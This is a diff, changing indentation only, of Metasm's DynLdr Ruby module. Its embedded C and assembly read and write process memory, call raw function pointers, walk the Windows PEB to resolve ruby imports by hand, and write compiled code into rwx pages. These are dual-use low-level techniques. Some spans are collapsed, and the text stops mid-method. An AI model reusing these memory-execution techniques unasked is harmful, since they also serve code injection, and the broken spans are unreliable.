unsigned i, argsz; - uintptr_t args_c[64]; - __int64 ret; - - argsz = ARY_LEN(args); - for (i=0U ; i 64) + rb_raise(*rb_eArgError, "bad args"); + + uintptr_t flags_v = VAL2INT(flags); + uintptr_t ptr_v = VAL2INT(ptr); + unsigned i, argsz; + uintptr_t args_c[64]; + __int64 ret; + + argsz = ARY_LEN(args); + for (i=0U ; ilen = 8U; // len == 8, no need to ARY_LEN/EMBED stuff - - ret = rb_funcall(dynldr, rb_intern("callback_run"), 2, INT2VAL(caller_id), args); - - // dynldr.callback will give us the arity (in bytes) of the callback in args[0] - // we just put the stack lifting offset in caller_id for the asm stub to use - caller_id = VAL2INT(ARY_PTR(args)[0]); - - return VAL2INT(ret); + uintptr_t *addr = &arg0; + unsigned i, ret; + VALUE args = rb_ary_new2(8); + + // copy our args to a ruby-accessible buffer + for (i=0U ; i<8U ; ++i) + ARY_PTR(args)[i] = INT2VAL(*addr++); + RArray(args)->len = 8U; // len == 8, no need to ARY_LEN/EMBED stuff + + ret = rb_funcall(dynldr, rb_intern("callback_run"), 2, INT2VAL(caller_id), args); + + // dynldr.callback will give us the arity (in bytes) of the callback in args[0] + // we just put the stack lifting offset in caller_id for the asm stub to use + caller_id = VAL2INT(ARY_PTR(args)[0]); + + return VAL2INT(ret); } #elif defined __amd64__ @@ -288,88 +288,88 @@ class DynLdr // TODO float args static VALUE invoke(VALUE self, VALUE ptr, VALUE args, VALUE flags) { - if (TYPE(args) != T_ARRAY || ARY_LEN(args) > 16) - rb_raise(*rb_eArgError, "bad args"); - - uintptr_t flags_v = VAL2INT(flags); - uintptr_t ptr_v = VAL2INT(ptr); - int i, argsz; - uintptr_t args_c[16]; - uintptr_t ret; - uintptr_t (*ptr_f)(uintptr_t, ...) = (void*)ptr_v; - - argsz = (int)ARY_LEN(args); - for (i=0 ; i 16) + rb_raise(*rb_eArgError, "bad args"); + + uintptr_t flags_v = VAL2INT(flags); + uintptr_t ptr_v = VAL2INT(ptr); + int i, argsz; + uintptr_t args_c[16]; + uintptr_t ret; + uintptr_t (*ptr_f)(uintptr_t, ...) = (void*)ptr_v; + + argsz = (int)ARY_LEN(args); + for (i=0 ; ilen = 8; - ptr[0] = INT2VAL(arg0); - ptr[1] = INT2VAL(arg1); - ptr[2] = INT2VAL(arg2); - ptr[3] = INT2VAL(arg3); - ptr[4] = INT2VAL(arg4); - ptr[5] = INT2VAL(arg5); - ptr[6] = INT2VAL(arg6); - ptr[7] = INT2VAL(arg7); - - ret = rb_funcall(dynldr, rb_intern("callback_run"), 2, INT2VAL(cb_id), args); - - return VAL2INT(ret); + uintptr_t ret; + VALUE args = rb_ary_new2(8); + VALUE *ptr = ARY_PTR(args); + + RArray(args)->len = 8; + ptr[0] = INT2VAL(arg0); + ptr[1] = INT2VAL(arg1); + ptr[2] = INT2VAL(arg2); + ptr[3] = INT2VAL(arg3); + ptr[4] = INT2VAL(arg4); + ptr[5] = INT2VAL(arg5); + ptr[6] = INT2VAL(arg6); + ptr[7] = INT2VAL(arg7); + + ret = rb_funcall(dynldr, rb_intern("callback_run"), 2, INT2VAL(cb_id), args); + + return VAL2INT(ret); } #endif int Init_dynldr(void) __attribute__((export_as(Init_))) // to patch before parsing to match the .so name { - dynldr = rb_const_get(rb_const_get(*rb_cObject, rb_intern("Metasm")), rb_intern("DynLdr")); - rb_define_singleton_method(dynldr, "memory_read", memory_read, 2); - rb_define_singleton_method(dynldr, "memory_read_int", memory_read_int, 1); - rb_define_singleton_method(dynldr, "memory_write", memory_write, 2); - rb_define_singleton_method(dynldr, "memory_write_int", memory_write_int, 2); - rb_define_singleton_method(dynldr, "str_ptr", str_ptr, 1); - rb_define_singleton_method(dynldr, "rb_obj_to_value", rb_obj_to_value, 1); - rb_define_singleton_method(dynldr, "rb_value_to_obj", rb_value_to_obj, 1); - rb_define_singleton_method(dynldr, "sym_addr", sym_addr, 2); - rb_define_singleton_method(dynldr, "raw_invoke", invoke, 3); - rb_define_const(dynldr, "CALLBACK_TARGET", + dynldr = rb_const_get(rb_const_get(*rb_cObject, rb_intern("Metasm")), rb_intern("DynLdr")); + rb_define_singleton_method(dynldr, "memory_read", memory_read, 2); + rb_define_singleton_method(dynldr, "memory_read_int", memory_read_int, 1); + rb_define_singleton_method(dynldr, "memory_write", memory_write, 2); + rb_define_singleton_method(dynldr, "memory_write_int", memory_write_int, 2); + rb_define_singleton_method(dynldr, "str_ptr", str_ptr, 1); + rb_define_singleton_method(dynldr, "rb_obj_to_value", rb_obj_to_value, 1); + rb_define_singleton_method(dynldr, "rb_value_to_obj", rb_value_to_obj, 1); + rb_define_singleton_method(dynldr, "sym_addr", sym_addr, 2); + rb_define_singleton_method(dynldr, "raw_invoke", invoke, 3); + rb_define_const(dynldr, "CALLBACK_TARGET", #ifdef __i386__ - INT2VAL((VALUE)&callback_handler)); + INT2VAL((VALUE)&callback_handler)); #elif defined __amd64__ - INT2VAL((VALUE)&do_callback_handler)); + INT2VAL((VALUE)&do_callback_handler)); #endif - rb_define_const(dynldr, "CALLBACK_ID_0", INT2VAL((VALUE)&callback_id_0)); - rb_define_const(dynldr, "CALLBACK_ID_1", INT2VAL((VALUE)&callback_id_1)); - return 0; + rb_define_const(dynldr, "CALLBACK_ID_0", INT2VAL((VALUE)&callback_id_0)); + rb_define_const(dynldr, "CALLBACK_ID_1", INT2VAL((VALUE)&callback_id_1)); + return 0; } EOS - # see the note in compile_bin_module - # this is a dynamic resolver for the ruby symbols we use - DYNLDR_C_PE_HACK = <ldr->inloadorder; - ptr = ((struct _lmodule *)base)->next; - ptr = ptr->next; // skip the first entry = ruby.exe - while (ptr != base) { - if (wstrcaseruby(ptr->basename, ptr->len/2)) - return ptr->base; - ptr = ptr->next; - } - - return 0; + struct _lmodule *ptr; + void *base; + struct _peb *peb = get_peb(); + + base = &peb->ldr->inloadorder; + ptr = ((struct _lmodule *)base)->next; + ptr = ptr->next; // skip the first entry = ruby.exe + while (ptr != base) { + if (wstrcaseruby(ptr->basename, ptr->len/2)) + return ptr->base; + ptr = ptr->next; + } + + return 0; } // find the ruby library from an address in the ruby module (Init_dynldr retaddr) static uintptr_t find_ruby_module_mem(uintptr_t someaddr) { - // could __try{}, but with no imports we're useless anyway. - uintptr_t ptr = someaddr & (-0x10000); - while (*((unsigned __int16 *)ptr) != 'ZM') // XXX too weak? - ptr -= 0x10000; - return ptr; + // could __try{}, but with no imports we're useless anyway. + uintptr_t ptr = someaddr & (-0x10000); + while (*((unsigned __int16 *)ptr) != 'ZM') // XXX too weak? + ptr -= 0x10000; + return ptr; } // a table of string offsets, base = the table itself @@ -462,111 +462,111 @@ class DynLdr // resolve the ruby imports found by offset in ruby_import_table int load_ruby_imports(uintptr_t rbaddr) { - uintptr_t ruby_module; - uintptr_t *ptr; - char *table; - - static int loaded_ruby_imports = 0; - if (loaded_ruby_imports) - return 0; - loaded_ruby_imports = 1; - - if (rbaddr) - ruby_module = find_ruby_module_mem(rbaddr); - else - ruby_module = find_ruby_module_peb(); - - if (!ruby_module) - return 0; - - ptr = &ruby_import_table; - table = (char*)ptr; - - while (*ptr) { - if (!(*ptr = GetProcAddress(ruby_module, table+*ptr))) - // TODO warning or something - return 0; - ptr++; - } - - return 1; + uintptr_t ruby_module; + uintptr_t *ptr; + char *table; + + static int loaded_ruby_imports = 0; + if (loaded_ruby_imports) + return 0; + loaded_ruby_imports = 1; + + if (rbaddr) + ruby_module = find_ruby_module_mem(rbaddr); + else + ruby_module = find_ruby_module_peb(); + + if (!ruby_module) + return 0; + + ptr = &ruby_import_table; + table = (char*)ptr; + + while (*ptr) { + if (!(*ptr = GetProcAddress(ruby_module, table+*ptr))) + // TODO warning or something + return 0; + ptr++; + } + + return 1; } #ifdef __x86_64__ #define DLL_PROCESS_ATTACH 1 __stdcall int DllMain(void *handle, int reason, void *res) { - if (reason == DLL_PROCESS_ATTACH) - return load_ruby_imports(0); - return 1; + if (reason == DLL_PROCESS_ATTACH) + return load_ruby_imports(0); + return 1; } #endif EOS - # ia32 asm source for the native component: handles ABI stuff - DYNLDR_ASM_IA32 = < cb structure (inuse only) - - binmodule = find_bin_path - - if not File.exists?(binmodule) or File.stat(binmodule).mtime < File.stat(__FILE__).mtime - compile_binary_module(host_exe, host_cpu, binmodule) - end - - require binmodule - - @@callback_addrs << CALLBACK_ID_0 << CALLBACK_ID_1 - end - - # compile the dynldr binary ruby module for a specific arch/cpu/modulename - def self.compile_binary_module(exe, cpu, modulename) - bin = exe.new(cpu) - # compile the C code, but patch the Init_ export name, which must match the string used in 'require' - module_c_src = DYNLDR_C.gsub('', File.basename(modulename, '.so')) - bin.compile_c module_c_src - # compile the Asm stuff according to the target architecture - bin.assemble case cpu.shortname - when 'ia32'; DYNLDR_ASM_IA32 - when 'x64'; DYNLDR_ASM_X86_64 - end - - # tweak the resulting binary linkage procedures if needed - compile_binary_module_hack(bin) - - # save the shared library - bin.encode_file(modulename, :lib) - end - - def self.compile_binary_module_hack(bin) - # this is a hack - # we need the module to use ruby symbols - # but we don't know the actual ruby lib filename (depends on ruby version, # platform, ...) - case bin.shortname - when 'elf' - # we know the lib is already loaded by the main ruby executable, no DT_NEEDED needed - class << bin - def automagic_symbols(*a) - # do the plt generation - super(*a) - # but remove the specific lib names - @tag.delete 'NEEDED' - end - end - return - when 'coff' - # the hard part, see below - else - # unhandled arch, dont tweak - return - end - - # we remove the PE IAT section related to ruby symbols, and make - # a manual symbol resolution on module loading. - - # populate the ruby import table ourselves on module loading - bin.imports.delete_if { |id| id.libname =~ /ruby/ } - - # we generate something like: - # .data - # ruby_import_table: - # rb_cObject dd str_rb_cObject - ruby_import_table - # riat_rb_intern dd str_rb_intern - ruby_import_table - # dd 0 - # - # .rodata - # str_rb_cObject db "rb_cObject", 0 - # str_rb_intern db "rb_intern", 0 - # - # .text - # rb_intern: jmp [riat_rb_intern] - # - # the PE_HACK code will parse ruby_import_table and make the symbol resolution on startup - - # setup the string table and the thunks - text = bin.sections.find { |s| s.name == '.text' }.encoded - rb_syms = text.reloc_externals.grep(/^rb_/) - - dd = (bin.cpu.size == 64 ? 'dq' : 'dd') - - init_symbol = text.export.keys.grep(/^Init_/).first - raise 'no Init_mname symbol found' if not init_symbol - if bin.cpu.size == 32 - # hax to find the base of libruby under Win98 (peb sux) - text.export[init_symbol + '_real'] = text.export.delete(init_symbol) - bin.unique_labels_cache.delete(init_symbol) - end - - # the C glue: getprocaddress etc - bin.compile_c DYNLDR_C_PE_HACK.gsub('Init_dynldr', init_symbol) - - # the IAT, initialized with relative offsets to symbol names - asm_table = ['.data', '.align 8', 'ruby_import_table:'] - # strings will be in .rodata - bin.parse('.rodata') - rb_syms.each { |sym| - # raw symbol name - str_label = bin.parse_new_label('str', "db #{sym.inspect}, 0") - - if sym !~ /^rb_[ce][A-Z]/ - # if we dont reference a data import (rb_cClass / rb_eException), - # then create a function thunk - i = PE::ImportDirectory::Import.new - i.thunk = sym - sym = i.target = 'riat_' + str_label - bin.arch_encode_thunk(text, i) # encode a jmp [importtable] - end - - # update the IAT - asm_table << "#{sym} #{dd} #{str_label} - ruby_import_table" - } - # IAT null-terminated - asm_table << "#{dd} 0" - - # now parse & assemble the IAT in .data - bin.assemble asm_table.join("\n") - end - - # find the path of the binary module - # if none exists, create a path writeable by the current user - def self.find_bin_path - fname = ['dynldr', host_arch, host_cpu.shortname, - ('19' if RUBY_VERSION >= '1.9')].compact.join('-') + '.so' - dir = File.dirname(__FILE__) - binmodule = File.join(dir, fname) - if not File.exists? binmodule or File.stat(binmodule).mtime < File.stat(__FILE__).mtime - if not dir = find_write_dir - raise LoadError, "no writable dir to put the DynLdr ruby module, try to run as root" - end - binmodule = File.join(dir, fname) - end - binmodule - end - - # find a writeable directory - # searches this script directory, $HOME / %APPDATA% / %USERPROFILE%, or $TMP - def self.find_write_dir - writable = lambda { |d| - begin - foo = '/_test_write_' + rand(1<<32).to_s - true if File.writable?(d) and - File.open(d+foo, 'w') { true } and - File.unlink(d+foo) - rescue - end - } - dir = File.dirname(__FILE__) - return dir if writable[dir] - dir = ENV['HOME'] || ENV['APPDATA'] || ENV['USERPROFILE'] - if writable[dir] - dir = File.join(dir, '.metasm') - Dir.mkdir dir if not File.directory? dir - return dir - end - ENV['TMP'] || ENV['TEMP'] || '.' - end - - # CPU suitable for compiling code for the current running host - def self.host_cpu - @cpu ||= - case RUBY_PLATFORM - when /i[3-6]86/; Ia32.new - when /x86_64|x64/i; X86_64.new - else raise LoadError, "Unsupported host platform #{RUBY_PLATFORM}" - end - end - - # returns whether we run on linux or windows - def self.host_arch - case RUBY_PLATFORM - when /linux/i; :linux - when /mswin|mingw|cygwin/i; :windows - else raise LoadError, "Unsupported host platform #{RUBY_PLATFORM}" - end - end - - # ExeFormat suitable as current running host native module - def self.host_exe - case host_arch - when :linux; ELF - when :windows; PE - end - end - - # parse a C string into the @cp parser, create it if needed - def self.parse_c(src) - cp.parse(src) - end - - # compile a C fragment into a Shellcode, honors the host ABI - def self.compile_c(src) - # XXX could we reuse self.cp ? (for its macros etc) - cp = C::Parser.new(host_exe.new(host_cpu)) - cp.parse(src) - sc = Shellcode.new(host_cpu) - asm = host_cpu.new_ccompiler(cp, sc).compile - sc.assemble(asm) - end - - # retrieve the library where a symbol is to be found (uses AutoImport) - def self.lib_from_sym(symname) - case host_arch - when :linux; GNUExports::EXPORT - when :windows; WindowsExports::EXPORT - end[symname] - end - - # reads a bunch of C code, creates binding for those according to the prototypes - # handles enum/defines to define constants - # For each toplevel method prototype, it generates a ruby method in this module, the name is lowercased - # For each numeric macro/enum, it also generates an uppercase named constant - # When such a function is called with a lambda as argument, a callback is created for the duration of the call - # and destroyed afterwards ; use callback_alloc_c to get a callback id with longer life span - def self.new_api_c(proto, fromlib=nil) - proto += "\n;" # allow 'int foo()' and '#include ' - parse_c(proto) - - cp.toplevel.symbol.dup.each_value { |v| - next if not v.kind_of? C::Variable # enums - cp.toplevel.symbol.delete v.name - lib = fromlib || lib_from_sym(v.name) - addr = sym_addr(lib, v.name) - if addr == 0 or addr == -1 or addr == 0xffff_ffff or addr == 0xffffffff_ffffffff - api_not_found(lib, v) - next - end - - rbname = c_func_name_to_rb(v.name) - if not v.type.kind_of? C::Function - # not a function, simply return the symbol address - # TODO struct/table access through hash/array ? - class << self ; self ; end.send(:define_method, rbname) { addr } - next - end - next if v.initializer # inline & stuff - puts "new_api_c: load method #{rbname} from #{lib}" if $DEBUG - - new_caller_for(v, rbname, addr) - } - - # predeclare constants from enums - # macros are handled in const_missing (too slow to (re)do here everytime) - # TODO #define FOO(v) (v<<1)|1 => create ruby counterpart - cexist = constants.inject({}) { |h, c| h.update c.to_s => true } - cp.toplevel.symbol.each { |k, v| - if v.kind_of? ::Integer - n = c_const_name_to_rb(k) - const_set(n, v) if v.kind_of? Integer and not cexist[n] - end - } - - # avoid WTF rb warning: toplevel const TRUE referenced by WinAPI::TRUE - cp.lexer.definition.each_key { |k| - n = c_const_name_to_rb(k) - if not cexist[n] and Object.const_defined?(n) and v = @cp.macro_numeric(n) - const_set(n, v) - end - } - end - - # const_missing handler: will try to find a matching #define - def self.const_missing(c) - # infinite loop on autorequire C.. - return super(c) if not defined? @cp or not @cp - - cs = c.to_s - if @cp.lexer.definition[cs] - m = cs - else - m = @cp.lexer.definition.keys.find { |k| c_const_name_to_rb(k) == cs } - end - - if m and v = @cp.macro_numeric(m) - const_set(c, v) - v - else - super(c) - end - end - - # when defining ruby wrapper for C methods, the ruby method name is the string returned by this function from the C name - def self.c_func_name_to_rb(name) - n = name.to_s.gsub(/[^a-z0-9_]/i) { |c| c.unpack('H*')[0] }.downcase - n = "m#{n}" if n !~ /^[a-z]/ - n - end - - # when defining ruby wrapper for C constants (numeric define/enum), the ruby const name is - # the string returned by this function from the C name. It should follow ruby standards (1st letter upcase) - def self.c_const_name_to_rb(name) - n = name.to_s.gsub(/[^a-z0-9_]/i) { |c| c.unpack('H*')[0] }.upcase - n = "C#{n}" if n !~ /^[A-Z]/ - n - end - - def self.api_not_found(lib, func) - raise "could not find symbol #{func.name.inspect} in #{lib.inspect}" - end - - # called whenever a native API is called through new_api_c/new_func_c/etc - def self.trace_invoke(api, args) - #p api - end - - # define a new method 'name' in the current module to invoke the raw method at addr addr - # translates ruby args to raw args using the specified prototype - def self.new_caller_for(proto, name, addr) - flags = 0 - flags |= 1 if proto.has_attribute('stdcall') - flags |= 2 if proto.has_attribute('fastcall') - flags |= 4 if proto.type.type.integral? and cp.sizeof(nil, proto.type.type) == 8 - flags |= 8 if proto.type.type.float? - class << self ; self ; end.send(:define_method, name) { |*a| - raise ArgumentError, "bad arg count for #{name}: #{a.length} for #{proto.type.args.length}" if a.length != proto.type.args.length and not proto.type.varargs - - # convert the arglist suitably for raw_invoke - auto_cb = [] # list of automatic C callbacks generated from lambdas - a = a.zip(proto.type.args).map { |ra, fa| - aa = convert_rb2c(fa, ra, :cb_list => auto_cb) - if fa and fa.type.integral? and cp.sizeof(fa) == 8 and host_cpu.size == 32 - aa = [aa & 0xffff_ffff, (aa >> 32) & 0xffff_ffff] - aa.reverse! if host_cpu.endianness != :little - end - aa - }.flatten - - trace_invoke(name, a) - # do it - ret = raw_invoke(addr, a, flags) - - # cleanup autogenerated callbacks - auto_cb.each { |cb| callback_free(cb) } - - # interpret return value - ret = convert_ret_c2rb(proto, ret) - } - end - - # ruby object -> integer suitable as arg for raw_invoke - def self.convert_rb2c(formal, val, opts=nil) - case val - when String; str_ptr(val) - when Proc; cb = callback_alloc_cobj(formal, val) ; (opts[:cb_list] << cb if opts and opts[:cb_list]) ; cb - when C::AllocCStruct; str_ptr(val.str) + val.stroff - when Hash - if not formal.type.pointed.kind_of?(C::Struct) - raise "invalid argument #{val.inspect} for #{formal}, need a struct*" - end - buf = cp.alloc_c_struct(formal, val) - val.instance_variable_set('@rb2c', buf) # GC trick: lifetime(buf) >= lifetime(hash) (XXX or until next call to convert_rb2c) - str_ptr(buf.str) - #when Float; val # TODO handle that in raw_invoke C code - else - v = val.to_i rescue 0 # NaN, Infinity, etc - v = -v if v == -(1<<(cp.typesize[:ptr]*8-1)) # ruby bug... raise -0x8000_0000: out of ulong range - v - end - end - - # this method is called from the C part to run the ruby code corresponding to - # a given C callback allocated by callback_alloc_c - def self.callback_run(id, args) - cb = @@callback_table[id] - raise "invalid callback #{'%x' % id} not in #{@@callback_table.keys.map { |c| c.to_s(16) }}" if not cb - - rawargs = args.dup - ra = cb[:proto] ? cb[:proto].args.map { |fa| convert_cbargs_c2rb(fa, rawargs) } : [] - - # run it - ret = cb[:proc].call(*ra) - - # the C code expects to find in args[0] the amount of stack fixing needed for __stdcall callbacks - args[0] = cb[:abi_stackfix] || 0 - ret - end - - # C raw cb arg -> ruby object - # will combine 2 32bit values for 1 64bit arg - def self.convert_cbargs_c2rb(formal, rawargs) - val = rawargs.shift - if formal.type.integral? and cp.sizeof(formal) == 8 and host_cpu.size == 32 - if host.cpu.endianness == :little - val |= rawargs.shift << 32 - else - val = (val << 32) | rawargs.shift - end - end - - convert_c2rb(formal, val) - end - - # interpret a raw decoded C value to a ruby value according to the C prototype - # handles signedness etc - # XXX val is an integer, how to decode Floats etc ? raw binary ptr ? - def self.convert_c2rb(formal, val) - formal = formal.type if formal.kind_of? C::Variable - val = Expression.make_signed(val, 8*cp.sizeof(formal)) if formal.integral? and formal.signed? - val = nil if formal.pointer? and val == 0 - val - end - - # C raw ret -> ruby obj - # can be overridden for system-specific calling convention (eg return 0/-1 => raise an error) - def self.convert_ret_c2rb(fproto, ret) - fproto = fproto.type if fproto.kind_of? C::Variable - convert_c2rb(fproto.untypedef.type, ret) - end - - def self.cp ; @cp ||= C::Parser.new(host_exe.new(host_cpu)) ; end - def self.cp=(c); @cp = c ; end - - # allocate a callback for a given C prototype (string) - # accepts full C functions (with body) (only 1 at a time) or toplevel 'asm' statement - def self.callback_alloc_c(proto, &b) - proto += ';' # allow 'int foo()' - parse_c(proto) - v = cp.toplevel.symbol.values.find_all { |v_| v_.kind_of? C::Variable and v_.type.kind_of? C::Function }.first - if (v and v.initializer) or cp.toplevel.statements.find { |st| st.kind_of? C::Asm } - cp.toplevel.statements.delete_if { |st| st.kind_of? C::Asm } - cp.toplevel.symbol.delete v.name if v - sc = compile_c(proto) - ptr = memory_alloc(sc.encoded.length) - sc.base_addr = ptr - # TODO fixup external calls - memory_write ptr, sc.encode_string - memory_perm ptr, sc.encoded.length, 'rwx' - ptr - elsif not v - raise 'empty prototype' - else - cp.toplevel.symbol.delete v.name - callback_alloc_cobj(v, b) - end - end - - # allocates a callback for a given C prototype (C variable, pointer to func accepted) - def self.callback_alloc_cobj(proto, b) - ori = proto - proto = proto.type if proto and proto.kind_of? C::Variable - proto = proto.pointed while proto and proto.pointer? - id = callback_find_id - cb = {} - cb[:id] = id - cb[:proc] = b - cb[:proto] = proto - cb[:abi_stackfix] = proto.args.inject(0) { |s, a| s + [cp.sizeof(a), cp.typesize[:ptr]].max } if ori and ori.has_attribute('stdcall') - cb[:abi_stackfix] = proto.args[2..-1].to_a.inject(0) { |s, a| s + [cp.sizeof(a), cp.typesize[:ptr]].max } if ori and ori.has_attribute('fastcall') # supercedes stdcall - @@callback_table[id] = cb - id - end - - # releases a callback id, so that it may be reused by a later callback_alloc - def self.callback_free(id) - @@callback_table.delete id - end - - # finds a free callback id, allocates a new page if needed - def self.callback_find_id - if not id = @@callback_addrs.find { |a| not @@callback_table[a] } - cb_page = memory_alloc(4096) - sc = Shellcode.new(host_cpu, cb_page) - case sc.cpu.shortname - when 'ia32' - addr = cb_page - nrcb = 128 # TODO should be 4096/5, but the parser/compiler is really too slow - nrcb.times { - @@callback_addrs << addr - sc.parse "call #{CALLBACK_TARGET}" - addr += 5 - } - when 'x64' - addr = cb_page - nrcb = 128 # same remark - nrcb.times { - @@callback_addrs << addr - sc.parse "1: lea rax, [rip-$_+1b] jmp #{CALLBACK_TARGET}" - addr += 12 # XXX approximative.. - } - end - sc.assemble - memory_write cb_page, sc.encode_string - memory_perm cb_page, 4096, 'rx' - raise 'callback_alloc bouh' if not id = @@callback_addrs.find { |a| not @@callback_table[a] } - end - id - end - - # compile a bunch of C functions, defines methods in this module to call them - # returns the raw pointer to the code page - # if given a block, run the block and then undefine all the C functions & free memory - def self.new_func_c(src) - sc = compile_c(src) - ptr = memory_alloc(sc.encoded.length) - sc.base_addr = ptr - bd = sc.encoded.binding(ptr) - sc.encoded.reloc_externals.uniq.each { |ext| bd[ext] = sym_addr(lib_from_sym(ext), ext) or raise "unknown symbol #{ext}" } - sc.encoded.fixup(bd) - memory_write ptr, sc.encode_string - memory_perm ptr, sc.encoded.length, 'rwx' - parse_c(src) # XXX the Shellcode parser may have defined stuff / interpreted C another way... - defs = [] - cp.toplevel.symbol.dup.each_value { |v| - next if not v.kind_of? C::Variable - cp.toplevel.symbol.delete v.name - next if not v.type.kind_of? C::Function or not v.initializer - next if not off = sc.encoded.export[v.name] - rbname = c_func_name_to_rb(v.name) - new_caller_for(v, rbname, ptr+off) - defs << rbname - } - if block_given? - begin - yield - ensure - defs.each { |d| class << self ; self ; end.send(:remove_method, d) } - memory_free ptr - end - else - ptr - end - end - - # compile an asm sequence, callable with the ABI of the C prototype given - # function name comes from the prototype - def self.new_func_asm(proto, asm) - proto += "\n;" - old = cp.toplevel.symbol.keys - parse_c(proto) - news = cp.toplevel.symbol.keys - old - raise "invalid proto #{proto}" if news.length != 1 - f = cp.toplevel.symbol[news.first] - raise "invalid func proto #{proto}" if not f.name or not f.type.kind_of? C::Function or f.initializer - cp.toplevel.symbol.delete f.name - - sc = Shellcode.assemble(host_cpu, asm) - ptr = memory_alloc(sc.encoded.length) - bd = sc.encoded.binding(ptr) - sc.encoded.reloc_externals.uniq.each { |ext| bd[ext] = sym_addr(lib_from_sym(ext), ext) or raise "unknown symbol #{ext}" } - sc.encoded.fixup(bd) - memory_write ptr, sc.encode_string - memory_perm ptr, sc.encoded.length, 'rwx' - rbname = c_func_name_to_rb(f.name) - new_caller_for(f, rbname, ptr) - if block_given? - begin - yield - ensure - class << self ; self ; end.send(:remove_method, rbname) - memory_free ptr - end - else - ptr - end - end - - # allocate a C::AllocCStruct to hold a specific struct defined in a previous new_api_c - def self.alloc_c_struct(structname, values={}) - cp.alloc_c_struct(structname, values) - end - - # return a C::AllocCStruct mapped over the string (with optionnal offset) - # str may be an EncodedData - def self.decode_c_struct(structname, str, off=0) - str = str.data if str.kind_of? EncodedData - cp.decode_c_struct(structname, str, off) - end - - # allocate a C::AllocCStruct holding an Array of typename variables - # if len is an int, it holds the ary length, or it can be an array of initialisers - # eg alloc_c_ary("int", [4, 5, 28]) - def self.alloc_c_ary(typename, len) - cp.alloc_c_ary(typename, len) - end - - # return a C::AllocCStruct holding an array of type typename mapped over str - def self.decode_c_ary(typename, len, str, off=0) - cp.decode_c_ary(typename, len, str, off) - end - - # return an AllocCStruct holding an array of 1 element of type typename - # access its value with obj[0] - # useful when you need a pointer to an int that will be filled by an API: use alloc_c_ptr('int') - def self.alloc_c_ptr(typename, init=nil) - cp.alloc_c_ary(typename, (init ? [init] : 1)) - end - - # return the binary version of a ruby value encoded as a C variable - # only integral types handled for now - def self.encode_c_value(var, val) - cp.encode_c_value(var, val) - end - - # decode a C variable - # only integral types handled for now - def self.decode_c_value(str, var, off=0) - cp.decode_c_value(str, var, off) - end - - # read a 0-terminated string from memory - def self.memory_read_strz(ptr, szmax=4096) - # read up to the end of the ptr memory page - pglim = (ptr + 0x1000) & ~0xfff - sz = [pglim-ptr, szmax].min - data = memory_read(ptr, sz) - return data[0, data.index(?\0)] if data.index(?\0) - if sz < szmax - data = memory_read(ptr, szmax) - data = data[0, data.index(?\0)] if data.index(?\0) - end - data - end - - # read a 0-terminated wide string from memory - def self.memory_read_wstrz(ptr, szmax=4096) - # read up to the end of the ptr memory page - pglim = (ptr + 0x1000) & ~0xfff - sz = [pglim-ptr, szmax].min - data = memory_read(ptr, sz) - if i = data.unpack('v*').index(0) - return data[0, 2*i] - end - if sz < szmax - data = memory_read(ptr, szmax) - data = data[0, 2*i] if i = data.unpack('v*').index(0) - end - data - end - - # automatically build/load the bin module - start - - case host_arch - when :windows - - new_api_c < cb structure (inuse only) + + binmodule = find_bin_path + + if not File.exists?(binmodule) or File.stat(binmodule).mtime < File.stat(__FILE__).mtime + compile_binary_module(host_exe, host_cpu, binmodule) + end + + require binmodule + + @@callback_addrs << CALLBACK_ID_0 << CALLBACK_ID_1 + end + + # compile the dynldr binary ruby module for a specific arch/cpu/modulename + def self.compile_binary_module(exe, cpu, modulename) + bin = exe.new(cpu) + # compile the C code, but patch the Init_ export name, which must match the string used in 'require' + module_c_src = DYNLDR_C.gsub('', File.basename(modulename, '.so')) + bin.compile_c module_c_src + # compile the Asm stuff according to the target architecture + bin.assemble case cpu.shortname + when 'ia32'; DYNLDR_ASM_IA32 + when 'x64'; DYNLDR_ASM_X86_64 + end + + # tweak the resulting binary linkage procedures if needed + compile_binary_module_hack(bin) + + # save the shared library + bin.encode_file(modulename, :lib) + end + + def self.compile_binary_module_hack(bin) + # this is a hack + # we need the module to use ruby symbols + # but we don't know the actual ruby lib filename (depends on ruby version, # platform, ...) + case bin.shortname + when 'elf' + # we know the lib is already loaded by the main ruby executable, no DT_NEEDED needed + class << bin + def automagic_symbols(*a) + # do the plt generation + super(*a) + # but remove the specific lib names + @tag.delete 'NEEDED' + end + end + return + when 'coff' + # the hard part, see below + else + # unhandled arch, dont tweak + return + end + + # we remove the PE IAT section related to ruby symbols, and make + # a manual symbol resolution on module loading. + + # populate the ruby import table ourselves on module loading + bin.imports.delete_if { |id| id.libname =~ /ruby/ } + + # we generate something like: + # .data + # ruby_import_table: + # rb_cObject dd str_rb_cObject - ruby_import_table + # riat_rb_intern dd str_rb_intern - ruby_import_table + # dd 0 + # + # .rodata + # str_rb_cObject db "rb_cObject", 0 + # str_rb_intern db "rb_intern", 0 + # + # .text + # rb_intern: jmp [riat_rb_intern] + # + # the PE_HACK code will parse ruby_import_table and make the symbol resolution on startup + + # setup the string table and the thunks + text = bin.sections.find { |s| s.name == '.text' }.encoded + rb_syms = text.reloc_externals.grep(/^rb_/) + + dd = (bin.cpu.size == 64 ? 'dq' : 'dd') + + init_symbol = text.export.keys.grep(/^Init_/).first + raise 'no Init_mname symbol found' if not init_symbol + if bin.cpu.size == 32 + # hax to find the base of libruby under Win98 (peb sux) + text.export[init_symbol + '_real'] = text.export.delete(init_symbol) + bin.unique_labels_cache.delete(init_symbol) + end + + # the C glue: getprocaddress etc + bin.compile_c DYNLDR_C_PE_HACK.gsub('Init_dynldr', init_symbol) + + # the IAT, initialized with relative offsets to symbol names + asm_table = ['.data', '.align 8', 'ruby_import_table:'] + # strings will be in .rodata + bin.parse('.rodata') + rb_syms.each { |sym| + # raw symbol name + str_label = bin.parse_new_label('str', "db #{sym.inspect}, 0") + + if sym !~ /^rb_[ce][A-Z]/ + # if we dont reference a data import (rb_cClass / rb_eException), + # then create a function thunk + i = PE::ImportDirectory::Import.new + i.thunk = sym + sym = i.target = 'riat_' + str_label + bin.arch_encode_thunk(text, i) # encode a jmp [importtable] + end + + # update the IAT + asm_table << "#{sym} #{dd} #{str_label} - ruby_import_table" + } + # IAT null-terminated + asm_table << "#{dd} 0" + + # now parse & assemble the IAT in .data + bin.assemble asm_table.join("\n") + end + + # find the path of the binary module + # if none exists, create a path writeable by the current user + def self.find_bin_path + fname = ['dynldr', host_arch, host_cpu.shortname, + ('19' if RUBY_VERSION >= '1.9')].compact.join('-') + '.so' + dir = File.dirname(__FILE__) + binmodule = File.join(dir, fname) + if not File.exists? binmodule or File.stat(binmodule).mtime < File.stat(__FILE__).mtime 